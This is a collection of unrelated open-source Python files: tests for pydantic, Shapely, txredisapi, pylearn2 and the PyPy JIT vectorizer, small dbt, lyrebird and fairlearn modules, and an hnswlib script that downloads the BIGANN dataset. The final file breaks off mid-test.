if multiple_of < max_value - 1 or multiple_of == 0:
result = handle_constrained_int(create_constrained_field(multiple_of=multiple_of, lt=max_value))
assert passes_pydantic_multiple_validator(result, multiple_of)
else:
with pytest.raises(AssertionError):
handle_constrained_int(create_constrained_field(multiple_of=multiple_of, lt=max_value))
@given(
integers(min_value=-1000000000, max_value=1000000000),
integers(min_value=-1000000000, max_value=1000000000),
)
def test_handle_constrained_int_handles_multiple_of_with_le(val1, val2):
multiple_of, max_value = sorted([val1, val2])
if multiple_of < max_value or multiple_of == 0:
result = handle_constrained_int(create_constrained_field(multiple_of=multiple_of, le=max_value))
assert passes_pydantic_multiple_validator(result, multiple_of)
else:
with pytest.raises(AssertionError):
handle_constrained_int(create_constrained_field(multiple_of=multiple_of, le=max_value))
@given(
integers(min_value=-1000000000, max_value=1000000000),
integers(min_value=-1000000000, max_value=1000000000),
)
def test_handle_constrained_int_handles_multiple_of_with_ge(val1, val2):
min_value, multiple_of = sorted([val1, val2])
result = handle_constrained_int(create_constrained_field(multiple_of=multiple_of, ge=min_value))
assert passes_pydantic_multiple_validator(result, multiple_of)
@given(
integers(min_value=-1000000000, max_value=1000000000),
integers(min_value=-1000000000, max_value=1000000000),
)
def test_handle_constrained_int_handles_multiple_of_with_gt(val1, val2):
min_value, multiple_of = sorted([val1, val2])
result = handle_constrained_int(create_constrained_field(multiple_of=multiple_of, gt=min_value))
assert passes_pydantic_multiple_validator(result, multiple_of)
@given(
integers(min_value=-1000000000, max_value=1000000000),
integers(min_value=-1000000000, max_value=1000000000),
integers(min_value=-1000000000, max_value=1000000000),
)
def test_handle_constrained_int_handles_multiple_of_with_ge_and_le(val1, val2, val3):
min_value, multiple_of, max_value = sorted([val1, val2, val3])
if multiple_of < max_value and min_value < max_value or multiple_of == 0:
result = handle_constrained_int(create_constrained_field(multiple_of=multiple_of, ge=min_value, le=max_value))
assert passes_pydantic_multiple_validator(result, multiple_of)
else:
with pytest.raises(AssertionError):
handle_constrained_int(create_constrained_field(multiple_of=multiple_of, ge=min_value, le=max_value))
@given(
integers(min_value=-1000000000, max_value=1000000000),
integers(min_value=-1000000000, max_value=1000000000),
integers(min_value=-1000000000, max_value=1000000000),
)
def test_handle_constrained_int_handles_ge_and_le_with_lower_multiple_of(val1, val2, val3):
multiple_of, min_value, max_value = sorted([val1, val2, val3])
if multiple_of == 0 or multiple_of < max_value and min_value < max_value:
result = handle_constrained_int(create_constrained_field(multiple_of=multiple_of, ge=min_value, le=max_value))
assert passes_pydantic_multiple_validator(result, multiple_of)
else:
with pytest.raises(AssertionError):
handle_constrained_int(create_constrained_field(multiple_of=multiple_of, ge=min_value, le=max_value))
|
lyrebird/checker/event.py | DuXiao1997/lyrebird | 737 | 11155469 | from lyrebird import application
from .. import checker
class CheckerEventHandler:
def __call__(self, channel, *args, **kw):
def func(origin_func):
if not checker.scripts_tmp_storage.get(checker.TYPE_EVENT):
checker.scripts_tmp_storage[checker.TYPE_EVENT] = []
checker.scripts_tmp_storage[checker.TYPE_EVENT].append({
'name': origin_func.__name__,
'func': origin_func,
'channel': channel
})
return origin_func
return func
def issue(self, title, message):
notice = {
"title": title,
"message": message
}
application.server['event'].publish('notice', notice)
def publish(self, channel, message, *args, **kwargs):
application.server['event'].publish(channel, message, *args, **kwargs)
@staticmethod
def register(func_info):
application.server['event'].subscribe(func_info['channel'], func_info['func'])
@staticmethod
def unregister(func_info):
application.server['event'].unsubscribe(func_info['channel'], func_info['func'])
event = CheckerEventHandler()
|
fairlearn/datasets/_constants.py | alliesaizan/fairlearn | 1,142 | 11155483 | # Copyright (c) Microsoft Corporation and Fairlearn contributors.
# Licensed under the MIT License.
_DOWNLOAD_DIRECTORY_NAME = ".fairlearn-data"
|
core/dbt/events/adapter_endpoint.py | f1fe/dbt | 3,156 | 11155500 | from dataclasses import dataclass
from dbt.events.functions import fire_event
from dbt.events.types import (
AdapterEventDebug, AdapterEventInfo, AdapterEventWarning, AdapterEventError
)
@dataclass
class AdapterLogger():
name: str
def debug(self, msg, *args, exc_info=None, extra=None, stack_info=False):
event = AdapterEventDebug(name=self.name, base_msg=msg, args=args)
event.exc_info = exc_info
event.extra = extra
event.stack_info = stack_info
fire_event(event)
def info(self, msg, *args, exc_info=None, extra=None, stack_info=False):
event = AdapterEventInfo(name=self.name, base_msg=msg, args=args)
event.exc_info = exc_info
event.extra = extra
event.stack_info = stack_info
fire_event(event)
def warning(self, msg, *args, exc_info=None, extra=None, stack_info=False):
event = AdapterEventWarning(name=self.name, base_msg=msg, args=args)
event.exc_info = exc_info
event.extra = extra
event.stack_info = stack_info
fire_event(event)
def error(self, msg, *args, exc_info=None, extra=None, stack_info=False):
event = AdapterEventError(name=self.name, base_msg=msg, args=args)
event.exc_info = exc_info
event.extra = extra
event.stack_info = stack_info
fire_event(event)
# The default exc_info=True is what makes this method different
def exception(self, msg, *args, exc_info=True, extra=None, stack_info=False):
event = AdapterEventError(name=self.name, base_msg=msg, args=args)
event.exc_info = exc_info
event.extra = extra
event.stack_info = stack_info
fire_event(event)
def critical(self, msg, *args, exc_info=False, extra=None, stack_info=False):
event = AdapterEventError(name=self.name, base_msg=msg, args=args)
event.exc_info = exc_info
event.extra = extra
event.stack_info = stack_info
fire_event(event)
|
download_bigann.py | DmitryKey/hnswlib | 1,765 | 11155508 | <filename>download_bigann.py
import os.path
import os
links = ['ftp://ftp.irisa.fr/local/texmex/corpus/bigann_query.bvecs.gz',
'ftp://ftp.irisa.fr/local/texmex/corpus/bigann_gnd.tar.gz',
'ftp://ftp.irisa.fr/local/texmex/corpus/bigann_base.bvecs.gz']
os.makedirs('downloads', exist_ok=True)
os.makedirs('bigann', exist_ok=True)
for link in links:
name = link.rsplit('/', 1)[-1]
filename = os.path.join('downloads', name)
if not os.path.isfile(filename):
print('Downloading: ' + filename)
try:
os.system('wget --output-document=' + filename + ' ' + link)
except Exception as inst:
print(inst)
print(' Encountered unknown error. Continuing.')
else:
print('Already downloaded: ' + filename)
if filename.endswith('.tar.gz'):
command = 'tar -zxf ' + filename + ' --directory bigann'
else:
command = 'cat ' + filename + ' | gzip -dc > bigann/' + name.replace(".gz", "")
print("Unpacking file:", command)
os.system(command)
|
tests/test_blocking.py | ShadowJonathan/txredisapi | 104 | 11155511 | # coding: utf-8
# Copyright 2009 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from twisted.internet import defer
from twisted.trial import unittest
import txredisapi as redis
from tests.mixins import REDIS_HOST, REDIS_PORT
class TestBlockingCommands(unittest.TestCase):
QUEUE_KEY = 'txredisapi:test_queue'
TEST_KEY = 'txredisapi:test_key'
QUEUE_VALUE = 'queue_value'
@defer.inlineCallbacks
def testBlocking(self):
db = yield redis.ConnectionPool(REDIS_HOST, REDIS_PORT, poolsize=2,
reconnect=False)
yield db.delete(self.QUEUE_KEY, self.TEST_KEY)
# Block first connection.
d = db.brpop(self.QUEUE_KEY, timeout=3)
# Use second connection.
yield db.set(self.TEST_KEY, 'somevalue')
# Should use second connection again. Will block till end of
# brpop otherwise.
yield db.lpush('txredisapi:test_queue', self.QUEUE_VALUE)
brpop_result = yield d
self.assertNotEqual(brpop_result, None)
yield db.delete(self.QUEUE_KEY, self.TEST_KEY)
yield db.disconnect()
|
pylearn2/utils/tests/test_compile.py | ikervazquezlopez/Pylearn2 | 2,045 | 11155567 | """Tests for compilation utilities."""
import theano
import pickle
from pylearn2.utils.compile import (
compiled_theano_function, HasCompiledFunctions
)
class Dummy(HasCompiledFunctions):
const = 3.14159
@compiled_theano_function
def func(self):
val = theano.tensor.as_tensor_variable(self.const)
return theano.function([], val)
def test_simple_compilation():
x = Dummy()
f = x.func
g = x.func
assert f is g
assert abs(x.func() - Dummy.const) < 1e-6
def test_pickling():
a = Dummy()
assert abs(a.func() - Dummy.const) < 1e-6
serialized = pickle.dumps(a)
b = pickle.loads(serialized)
assert not hasattr(b, '_compiled_functions')
assert abs(b.func() - Dummy.const) < 1e-6
assert not (a.func is b.func)
|
tests/test_getitem.py | Jeremiah-England/Shapely | 2,382 | 11155575 | from . import unittest, shapely20_deprecated
from shapely import geometry
class CoordsGetItemTestCase(unittest.TestCase):
def test_index_2d_coords(self):
c = [(float(x), float(-x)) for x in range(4)]
g = geometry.LineString(c)
for i in range(-4, 4):
self.assertTrue(g.coords[i] == c[i])
self.assertRaises(IndexError, lambda: g.coords[4])
self.assertRaises(IndexError, lambda: g.coords[-5])
def test_index_3d_coords(self):
c = [(float(x), float(-x), float(x*2)) for x in range(4)]
g = geometry.LineString(c)
for i in range(-4, 4):
self.assertTrue(g.coords[i] == c[i])
self.assertRaises(IndexError, lambda: g.coords[4])
self.assertRaises(IndexError, lambda: g.coords[-5])
def test_index_coords_misc(self):
g = geometry.LineString() # empty
self.assertRaises(IndexError, lambda: g.coords[0])
self.assertRaises(TypeError, lambda: g.coords[0.0])
def test_slice_2d_coords(self):
c = [(float(x), float(-x)) for x in range(4)]
g = geometry.LineString(c)
self.assertTrue(g.coords[1:] == c[1:])
self.assertTrue(g.coords[:-1] == c[:-1])
self.assertTrue(g.coords[::-1] == c[::-1])
self.assertTrue(g.coords[::2] == c[::2])
self.assertTrue(g.coords[:4] == c[:4])
self.assertTrue(g.coords[4:] == c[4:] == [])
def test_slice_3d_coords(self):
c = [(float(x), float(-x), float(x*2)) for x in range(4)]
g = geometry.LineString(c)
self.assertTrue(g.coords[1:] == c[1:])
self.assertTrue(g.coords[:-1] == c[:-1])
self.assertTrue(g.coords[::-1] == c[::-1])
self.assertTrue(g.coords[::2] == c[::2])
self.assertTrue(g.coords[:4] == c[:4])
self.assertTrue(g.coords[4:] == c[4:] == [])
class MultiGeomGetItemTestCase(unittest.TestCase):
@shapely20_deprecated
def test_index_multigeom(self):
c = [(float(x), float(-x)) for x in range(4)]
g = geometry.MultiPoint(c)
for i in range(-4, 4):
self.assertTrue(g[i].equals(geometry.Point(c[i])))
self.assertRaises(IndexError, lambda: g[4])
self.assertRaises(IndexError, lambda: g[-5])
@shapely20_deprecated
def test_index_multigeom_misc(self):
g = geometry.MultiLineString() # empty
self.assertRaises(IndexError, lambda: g[0])
self.assertRaises(TypeError, lambda: g[0.0])
@shapely20_deprecated
def test_slice_multigeom(self):
c = [(float(x), float(-x)) for x in range(4)]
g = geometry.MultiPoint(c)
self.assertEqual(type(g[:]), type(g))
self.assertEqual(len(g[:]), len(g))
self.assertTrue(g[1:].equals(geometry.MultiPoint(c[1:])))
self.assertTrue(g[:-1].equals(geometry.MultiPoint(c[:-1])))
self.assertTrue(g[::-1].equals(geometry.MultiPoint(c[::-1])))
self.assertTrue(g[4:].is_empty)
class LinearRingGetItemTestCase(unittest.TestCase):
def test_index_linearring(self):
shell = geometry.polygon.LinearRing([(0.0, 0.0), (70.0, 120.0),
(140.0, 0.0), (0.0, 0.0)])
holes = [geometry.polygon.LinearRing([(60.0, 80.0), (80.0, 80.0),
(70.0, 60.0), (60.0, 80.0)]),
geometry.polygon.LinearRing([(30.0, 10.0), (50.0, 10.0),
(40.0, 30.0), (30.0, 10.0)]),
geometry.polygon.LinearRing([(90.0, 10), (110.0, 10.0),
(100.0, 30.0), (90.0, 10.0)])]
g = geometry.Polygon(shell, holes)
for i in range(-3, 3):
self.assertTrue(g.interiors[i].equals(holes[i]))
self.assertRaises(IndexError, lambda: g.interiors[3])
self.assertRaises(IndexError, lambda: g.interiors[-4])
def test_index_linearring_misc(self):
g = geometry.Polygon() # empty
self.assertRaises(IndexError, lambda: g.interiors[0])
self.assertRaises(TypeError, lambda: g.interiors[0.0])
def test_slice_linearring(self):
shell = geometry.polygon.LinearRing([(0.0, 0.0), (70.0, 120.0),
(140.0, 0.0), (0.0, 0.0)])
holes = [geometry.polygon.LinearRing([(60.0, 80.0), (80.0, 80.0),
(70.0, 60.0), (60.0, 80.0)]),
geometry.polygon.LinearRing([(30.0, 10.0), (50.0, 10.0),
(40.0, 30.0), (30.0, 10.0)]),
geometry.polygon.LinearRing([(90.0, 10), (110.0, 10.0),
(100.0, 30.0), (90.0, 10.0)])]
g = geometry.Polygon(shell, holes)
t = [a.equals(b) for (a, b) in zip(g.interiors[1:], holes[1:])]
self.assertTrue(all(t))
t = [a.equals(b) for (a, b) in zip(g.interiors[:-1], holes[:-1])]
self.assertTrue(all(t))
t = [a.equals(b) for (a, b) in zip(g.interiors[::-1], holes[::-1])]
self.assertTrue(all(t))
t = [a.equals(b) for (a, b) in zip(g.interiors[::2], holes[::2])]
self.assertTrue(all(t))
t = [a.equals(b) for (a, b) in zip(g.interiors[:3], holes[:3])]
self.assertTrue(all(t))
self.assertTrue(g.interiors[3:] == holes[3:] == [])
|
tests/stress/recursive_gen.py | sebastien-riou/micropython | 13,648 | 11155583 | <filename>tests/stress/recursive_gen.py
# test deeply recursive generators
# simple "yield from" recursion
def gen():
yield from gen()
try:
list(gen())
except RuntimeError:
print("RuntimeError")
# recursion via an iterator over a generator
def gen2():
for x in gen2():
yield x
try:
next(gen2())
except RuntimeError:
print("RuntimeError")
|
rpython/jit/metainterp/test/test_zvector.py | m4sterchain/mesapy | 381 | 11155588 | <filename>rpython/jit/metainterp/test/test_zvector.py
import py
import sys
import pytest
import math
import functools
from hypothesis import given, note, strategies as st, settings
from rpython.jit.metainterp.warmspot import ll_meta_interp, get_stats
from rpython.jit.metainterp.test.support import LLJitMixin
from rpython.jit.codewriter.policy import StopAtXPolicy
from rpython.jit.metainterp.resoperation import rop
from rpython.jit.metainterp import history
from rpython.rlib.jit import JitDriver, hint, set_param
from rpython.rlib.objectmodel import compute_hash
from rpython.rtyper.lltypesystem import lltype, rffi
from rpython.rlib.rarithmetic import r_uint, intmask, r_int
from rpython.rlib.rawstorage import (alloc_raw_storage, raw_storage_setitem,
free_raw_storage, raw_storage_getitem)
from rpython.rlib.objectmodel import (specialize, is_annotation_constant,
always_inline)
from rpython.jit.backend.detect_cpu import getcpuclass
from rpython.jit.tool.oparser import parse
from rpython.jit.metainterp.history import (AbstractFailDescr,
AbstractDescr,
BasicFailDescr, BasicFinalDescr,
JitCellToken, TargetToken,
ConstInt, ConstPtr,
Const, ConstFloat)
CPU = getcpuclass()
if sys.maxint == 2**31-1:
pytest.skip("32bit platforms are not supported")
@specialize.argtype(0,1)
def malloc(T,n):
return lltype.malloc(T, n, flavor='raw', zero=True)
def free(mem):
lltype.free(mem, flavor='raw')
def isclose(a, b, rel_tol=1e-09, abs_tol=0.0):
return abs(a-b) <= max(rel_tol * max(abs(a), abs(b)), abs_tol) \
or (math.isnan(a) and math.isnan(b)) or \
(math.isinf(a) and math.isinf(b) and \
(a < 0.0 and b < 0.0) or \
(a > 0.0 and b > 0.0))
class RawStorage(object):
def __init__(self):
self.arrays = []
def new(self, values, type, size=None, zero=True):
bytecount = rffi.sizeof(type)
if not values:
array = alloc_raw_storage(size*bytecount, zero=zero)
self.arrays.append(array)
return array
else:
size = len(values)*bytecount
array = alloc_raw_storage(size, zero=zero)
for i,v in enumerate(values):
raw_storage_setitem(array, i*bytecount, rffi.cast(type,v))
self.arrays.append(array)
return array
def clear(self):
while self.arrays:
array = self.arrays.pop()
free_raw_storage(array)
@pytest.fixture(scope='function')
def rawstorage(request):
rs = RawStorage()
request.addfinalizer(rs.clear)
request.cls.a
return rs
class VectorizeTests(object):
enable_opts = 'intbounds:rewrite:virtualize:string:earlyforce:pure:heap:unroll'
def setup_method(self, method):
if not self.supports_vector_ext():
py.test.skip("this cpu %s has no implemented vector backend" % CPU)
def meta_interp(self, f, args, policy=None, vec=True, vec_all=False):
return ll_meta_interp(f, args, enable_opts=self.enable_opts,
policy=policy,
CPUClass=self.CPUClass,
type_system=self.type_system,
vec=vec, vec_all=vec_all)
# FLOAT UNARY
def _vector_float_unary(self, func, type, data):
func = always_inline(func)
size = rffi.sizeof(type)
myjitdriver = JitDriver(greens = [], reds = 'auto', vectorize=True)
def f(bytecount, va, vc):
i = 0
while i < bytecount:
myjitdriver.jit_merge_point()
a = raw_storage_getitem(type,va,i)
c = func(a)
raw_storage_setitem(vc, i, rffi.cast(type,c))
i += size
la = data.draw(st.lists(st.floats(), min_size=10, max_size=150))
l = len(la)
rawstorage = RawStorage()
va = rawstorage.new(la, type)
vc = rawstorage.new(None, type, size=l)
self.meta_interp(f, [l*size, va, vc], vec=True)
for i in range(l):
c = raw_storage_getitem(type,vc,i*size)
r = func(la[i])
assert isclose(r, c)
rawstorage.clear()
def vec_int_unary(test_func, unary_func, type):
return pytest.mark.parametrize('func,type', [
(unary_func, type)
])(given(data=st.data())(test_func))
vec_float_unary = functools.partial(vec_int_unary, _vector_float_unary)
test_vec_float_abs = \
vec_float_unary(lambda v: abs(v), rffi.DOUBLE)
test_vec_float_neg = \
vec_float_unary(lambda v: -v, rffi.DOUBLE)
# FLOAT BINARY
def _vector_simple_float(self, func, type, data):
func = always_inline(func)
size = rffi.sizeof(rffi.DOUBLE)
myjitdriver = JitDriver(greens = [], reds = 'auto', vectorize=True)
def f(bytecount, va, vb, vc):
i = 0
while i < bytecount:
myjitdriver.jit_merge_point()
a = raw_storage_getitem(type,va,i)
b = raw_storage_getitem(type,vb,i)
c = func(a,b)
raw_storage_setitem(vc, i, rffi.cast(type,c))
i += size
la = data.draw(st.lists(st.floats(), min_size=10, max_size=150))
l = len(la)
lb = data.draw(st.lists(st.floats(), min_size=l, max_size=l))
rawstorage = RawStorage()
va = rawstorage.new(la, type)
vb = rawstorage.new(lb, type)
vc = rawstorage.new(None, type, size=l)
self.meta_interp(f, [l*size, va, vb, vc], vec=True)
for i in range(l):
c = raw_storage_getitem(type,vc,i*size)
r = rffi.cast(type, func(la[i], lb[i]))
assert isclose(r, c)
rawstorage.clear()
def _vec_float_binary(test_func, func, type):
return pytest.mark.parametrize('func,type', [
(func, type)
])(given(data=st.data())(test_func))
vec_float_binary = functools.partial(_vec_float_binary, _vector_simple_float)
test_vec_float_add = \
vec_float_binary(lambda a,b: a+b, rffi.DOUBLE)
test_vec_float_sub = \
vec_float_binary(lambda a,b: a-b, rffi.DOUBLE)
test_vec_float_mul = \
vec_float_binary(lambda a,b: a*b, rffi.DOUBLE)
test_vec_float_cmp_eq = \
vec_float_binary(lambda a,b: a == b, rffi.DOUBLE)
test_vec_float_cmp_ne = \
vec_float_binary(lambda a,b: a != b, rffi.DOUBLE)
def _vector_simple_int(self, func, type, la):
oldfunc = func
func = always_inline(func)
size = rffi.sizeof(type)
myjitdriver = JitDriver(greens = [], reds = 'auto', vectorize=True)
def f(bytecount, va, vb, vc):
i = 0
while i < bytecount:
myjitdriver.jit_merge_point()
a = raw_storage_getitem(type,va,i)
b = raw_storage_getitem(type,vb,i)
c = func(a,b)
raw_storage_setitem(vc, i, rffi.cast(type,c))
i += size
l = len(la)
lb = list(reversed(la))[:]
rawstorage = RawStorage()
va = rawstorage.new(la, type)
vb = rawstorage.new(lb, type)
vc = rawstorage.new(None, type, size=l)
self.meta_interp(f, [l*size, va, vb, vc], vec=True)
for i in range(l):
c = raw_storage_getitem(type,vc,i*size)
assert rffi.cast(type, oldfunc(la[i], lb[i])) == c
rawstorage.clear()
def vec_int_arith(test_func, arith_func, type):
size = rffi.sizeof(type)
bits = size*8
assert 0 <= bits <= 64
integers = st.integers(min_value=-2**(bits-1), max_value=2**(bits-1)-1)
@given(st.lists(integers, min_size=10, max_size=15))
@settings(max_examples=20)
def tf(self, la):
return test_func(self, arith_func, type, la)
return tf
vec_int_arith = functools.partial(vec_int_arith, _vector_simple_int)
test_vec_simple_int_signed_add = \
vec_int_arith(lambda a,b: intmask(a+b), rffi.SIGNED)
test_vec_simple_int_int_add = \
vec_int_arith(lambda a,b: intmask(r_int(a)+r_int(b)), rffi.INT)
test_vec_simple_int_short_add = \
vec_int_arith(lambda a,b: intmask(r_int(a)+r_int(b)), rffi.SHORT)
test_vec_simple_int_signed_sub = \
vec_int_arith(lambda a,b: intmask(a-b), rffi.SIGNED)
test_vec_simple_int_sub_int = \
vec_int_arith(lambda a,b: intmask(r_int(a)-r_int(b)), rffi.INT)
test_vec_simple_int_sub_short = \
vec_int_arith(lambda a,b: intmask(r_int(a)-r_int(b)), rffi.SHORT)
test_vec_simple_int_signed_and = \
vec_int_arith(lambda a,b: intmask(a)&intmask(b), rffi.SIGNED)
test_vec_simple_int_int_and = \
vec_int_arith(lambda a,b: intmask(a)&intmask(b), rffi.INT)
test_vec_simple_int_short_and = \
vec_int_arith(lambda a,b: intmask(a)&intmask(b), rffi.SHORT)
test_vec_simple_int_or_signed = \
vec_int_arith(lambda a,b: intmask(a)|intmask(b), rffi.SIGNED)
test_vec_simple_int_or_int = \
vec_int_arith(lambda a,b: intmask(a)|intmask(b), rffi.INT)
test_vec_simple_int_or_short = \
vec_int_arith(lambda a,b: intmask(a)|intmask(b), rffi.SHORT)
test_vec_simple_int_xor_signed = \
vec_int_arith(lambda a,b: intmask(a)^intmask(b), rffi.SIGNED)
test_vec_simple_int_xor_int = \
vec_int_arith(lambda a,b: intmask(a)^intmask(b), rffi.INT)
test_vec_simple_int_xor_short = \
vec_int_arith(lambda a,b: intmask(a)^intmask(b), rffi.SHORT)
test_vec_simple_int_int_cmp_eq = \
vec_int_arith(lambda a,b: a == b, rffi.SIGNED)
test_vec_simple_int_int_cmp_ne = \
vec_int_arith(lambda a,b: a == b, rffi.SIGNED)
@py.test.mark.parametrize('i',[1,2,3,4,9])
def test_vec_register_too_small_vector(self, i):
myjitdriver = JitDriver(greens = [],
reds = 'auto',
vectorize=True)
T = lltype.Array(rffi.SHORT, hints={'nolength': True})
def g(d, va, vb):
i = 0
while i < d:
myjitdriver.jit_merge_point()
a = va[i]
b = vb[i]
ec = intmask(intmask(a) + intmask(b))
va[i] = rffi.r_short(ec)
i += 1
def f(d):
i = 0
va = lltype.malloc(T, d+100, flavor='raw', zero=True)
vb = lltype.malloc(T, d+100, flavor='raw', zero=True)
for j in range(d+100):
va[j] = rffi.r_short(1)
vb[j] = rffi.r_short(2)
g(d+100, va, vb)
g(d, va, vb) # this iteration might not fit into the vector register
res = intmask(va[d])
lltype.free(va, flavor='raw')
lltype.free(vb, flavor='raw')
return res
res = self.meta_interp(f, [i], vec=True)
assert res == f(i) == 3
def test_vec_max(self):
myjitdriver = JitDriver(greens = [],
reds = 'auto',
vectorize=True)
def fmax(v1, v2):
return v1 if v1 >= v2 or math.isnan(v2) else v2
T = lltype.Array(rffi.DOUBLE, hints={'nolength': True})
def f(d):
i = 0
va = lltype.malloc(T, d, flavor='raw', zero=True)
for j in range(d):
va[j] = float(j)
va[13] = 128.0
m = -128.0
while i < d:
myjitdriver.jit_merge_point()
a = va[i]
m = fmax(a, m)
i += 1
lltype.free(va, flavor='raw')
return m
res = self.meta_interp(f, [30], vec=True)
assert res == f(30) == 128
@py.test.mark.parametrize('type,func,init,insert,at,count,breaks',
# all
[(rffi.DOUBLE, lambda x: not bool(x), 1.0, None, -1,32, False),
(rffi.DOUBLE, lambda x: x == 0.0, 1.0, None, -1,33, False),
(rffi.DOUBLE, lambda x: x == 0.0, 1.0, 0.0, 33,34, True),
(rffi.DOUBLE, lambda x: x == 0.0, 1.0, 0.1, 4,34, False),
(lltype.Signed, lambda x: not bool(x), 1, None, -1,32, False),
(lltype.Signed, lambda x: not bool(x), 1, 0, 14,32, True),
(lltype.Signed, lambda x: not bool(x), 1, 0, 15,31, True),
(lltype.Signed, lambda x: not bool(x), 1, 0, 4,30, True),
(lltype.Signed, lambda x: x == 0, 1, None, -1,33, False),
(lltype.Signed, lambda x: x == 0, 1, 0, 33,34, True),
# any
(rffi.DOUBLE, lambda x: x != 0.0, 0.0, 1.0, 33,35, True),
(rffi.DOUBLE, lambda x: x != 0.0, 0.0, 1.0, -1,36, False),
(rffi.DOUBLE, lambda x: bool(x), 0.0, 1.0, 33,37, True),
(rffi.DOUBLE, lambda x: bool(x), 0.0, 1.0, -1,38, False),
(lltype.Signed, lambda x: x != 0, 0, 1, 33,35, True),
(lltype.Signed, lambda x: x != 0, 0, 1, -1,36, False),
(lltype.Signed, lambda x: bool(x), 0, 1, 33,37, True),
(lltype.Signed, lambda x: bool(x), 0, 1, -1,38, False),
(rffi.INT, lambda x: intmask(x) != 0, rffi.r_int(0), rffi.r_int(1), 33,35, True),
(rffi.INT, lambda x: intmask(x) != 0, rffi.r_int(0), rffi.r_int(1), -1,36, False),
(rffi.INT, lambda x: bool(intmask(x)), rffi.r_int(0), rffi.r_int(1), 33,37, True),
(rffi.INT, lambda x: bool(intmask(x)), rffi.r_int(0), rffi.r_int(1), -1,38, False),
])
def test_bool_reduction(self, type, func, init, insert, at, count, breaks):
myjitdriver = JitDriver(greens = [], reds = 'auto', vectorize=True)
T = lltype.Array(type, hints={'nolength': True})
def f(d):
va = lltype.malloc(T, d, flavor='raw', zero=True)
for i in range(d): va[i] = init
if at != -1:
va[at] = insert
i = 0 ; nobreak = False
while i < d:
myjitdriver.jit_merge_point()
b = func(va[i])
if b:
assert b
break
i += 1
else:
nobreak = True
lltype.free(va, flavor='raw')
return not nobreak
res = self.meta_interp(f, [count], vec=True)
assert res == f(count) == breaks
def _vec_reduce(self, strat, func, type, data):
func = always_inline(func)
size = rffi.sizeof(type)
myjitdriver = JitDriver(greens = [], reds = 'auto', vectorize=True)
def f(accum, bytecount, v):
i = 0
while i < bytecount:
myjitdriver.jit_merge_point()
e = raw_storage_getitem(type,v,i)
accum = func(accum,e)
i += size
return accum
la = data.draw(st.lists(strat, min_size=10, max_size=150))
#la = [1.0] * 10
l = len(la)
accum = data.draw(strat)
rawstorage = RawStorage()
va = rawstorage.new(la, type)
res = self.meta_interp(f, [accum, l*size, va], vec=True)
assert isclose(rffi.cast(type, res), f(accum, l*size, va))
rawstorage.clear()
def vec_reduce(test_func, strat, arith_func, type):
return pytest.mark.parametrize('strat,func,type', [
(strat, arith_func, type)
])(given(data=st.data())(test_func))
vec_reduce = functools.partial(vec_reduce, _vec_reduce)
test_vec_int_sum = vec_reduce(st.integers(min_value=-2**(64-1), max_value=2**(64-1)-1),
lambda a,b: lltype.intmask(lltype.intmask(a)+lltype.intmask(b)), lltype.Signed)
small_floats = st.floats(min_value=-100, max_value=100, allow_nan=False, allow_infinity=False)
test_vec_float_sum = vec_reduce(small_floats, lambda a,b: a+b, rffi.DOUBLE)
# PRECISION loss, because the numbers are accumulated (associative, commutative properties must hold)
# you can end up a small number and a huge number that is finally multiplied losing precision
# test_vec_float_prod = vec_reduce(small_floats, lambda a,b: a*b, rffi.DOUBLE)
def test_constant_expand(self):
myjitdriver = JitDriver(greens = [], reds = 'auto', vectorize=True)
T = lltype.Array(rffi.DOUBLE, hints={'nolength': True})
def f(d):
va = lltype.malloc(T, d, flavor='raw', zero=True)
i = 0
while i < d:
myjitdriver.jit_merge_point()
va[i] = va[i] + 34.5
i += 1
val = va[0]
lltype.free(va, flavor='raw')
return val
res = self.meta_interp(f, [60], vec=True)
assert res == f(60) == 34.5
def test_constant_expand_vec_all(self):
myjitdriver = JitDriver(greens = [], reds = 'auto')
T = lltype.Array(rffi.DOUBLE, hints={'nolength': True})
def f(d):
va = lltype.malloc(T, d, flavor='raw', zero=True)
i = 0
while i < d:
myjitdriver.jit_merge_point()
if not (i < d):
raise IndexError
va[i] = va[i] + 34.5
i += 1
val = va[0]
lltype.free(va, flavor='raw')
return val
res = self.meta_interp(f, [60], vec=True, vec_all=True)
assert res == f(60) == 34.5
@py.test.mark.parametrize('type,value', [(rffi.DOUBLE, 58.4547),
(lltype.Signed, 2300000), (rffi.INT, 4321),
(rffi.SHORT, 9922), (rffi.SIGNEDCHAR, -127)])
def test_variable_expand(self, type, value):
myjitdriver = JitDriver(greens = [], reds = 'auto', vectorize=True)
T = lltype.Array(type, hints={'nolength': True})
def f(d,variable):
va = lltype.malloc(T, d, flavor='raw', zero=True)
i = 0
while i < d:
myjitdriver.jit_merge_point()
va[i] = rffi.cast(type, variable)
i += 1
val = va[d//2]
lltype.free(va, flavor='raw')
return val
res = self.meta_interp(f, [60,value], vec=True)
assert res == f(60,value) == value
@py.test.mark.parametrize('vec,vec_all',[(False,True),(True,False),(True,True),(False,False)])
def test_accum(self, vec, vec_all):
myjitdriver = JitDriver(greens = [], reds = 'auto', vectorize=vec)
T = lltype.Array(rffi.DOUBLE)
def f(d, value):
va = lltype.malloc(T, d, flavor='raw', zero=True)
for i in range(d):
va[i] = value
r = 0
i = 0
k = d + 2
# in this case a guard k <= d is inserted which fails right away!
while i < d:
myjitdriver.jit_merge_point()
if not(i < k):
k -= 1
r += va[i]
i += 1
lltype.free(va, flavor='raw')
return r
res = self.meta_interp(f, [60,0.5], vec=vec, vec_all=vec_all)
assert res == f(60,0.5) == 60*0.5
@py.test.mark.parametrize('i',[15])
def test_array_bounds_check_elimination(self,i):
myjitdriver = JitDriver(greens = [],
reds = 'auto',
vectorize=True)
T = lltype.Array(rffi.INT, hints={'nolength': True})
def f(d):
va = lltype.malloc(T, d, flavor='raw', zero=True)
vb = lltype.malloc(T, d, flavor='raw', zero=True)
for j in range(d):
va[j] = rffi.r_int(j)
vb[j] = rffi.r_int(j)
i = 0
while i < d:
myjitdriver.jit_merge_point()
if i < 0:
raise IndexError
if i >= d:
raise IndexError
a = va[i]
if i < 0:
raise IndexError
if i >= d:
raise IndexError
b = vb[i]
ec = intmask(a)+intmask(b)
if i < 0:
raise IndexError
if i >= d:
raise IndexError
va[i] = rffi.r_int(ec)
i += 1
